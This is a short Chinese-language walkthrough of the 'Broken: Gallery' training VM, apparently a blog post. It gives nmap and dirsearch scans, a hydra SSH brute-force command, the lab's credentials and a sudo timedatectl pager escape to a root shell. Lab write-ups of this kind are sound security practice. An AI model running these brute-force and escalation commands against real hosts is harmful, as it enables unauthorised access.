Broken: Gallery靶机复现

CcHKer2024-08-18 16:34

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
绵绵细雨中的乡音1 小时前
网络基础知识
linux·网络
想睡hhh2 小时前
网络基础——协议认识
网络·智能路由器
G_H_S_3_4 小时前
【网络运维】Linux 文本处理利器:sed 命令
linux·运维·网络·操作文本
绝缘体14 小时前
折扣大牌点餐api接口对接适合本地生活吗?
大数据·网络·搜索引擎·pygame
猿究院--王升5 小时前
HTTP的协议
网络
G_H_S_3_6 小时前
【网络运维】Linux:正则表达式
linux·运维·网络·正则表达式
腾科张老师8 小时前
OSPF 典型组网
网络·智能路由器
2301_8016730113 小时前
8.19笔记
网络·安全
三坛海会大神55516 小时前
计算机网络参考模型与子网划分
网络·计算机网络
云卓SKYDROID17 小时前
无人机激光测距技术应用与挑战
网络·无人机·吊舱·高科技·云卓科技
热门推荐
01UV安装并设置国内源02DeepSeek更新!速览DeepSeek V3.1新特性03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04KGG转MP3工具|非KGM文件|解密音频05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)072025最新国内服务器可用docker源仓库地址大全(2025年8月更新)08Spring 调试终于不再痛苦了09Claude Code VSCode集成开发指南:AI编程助手完整配置10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南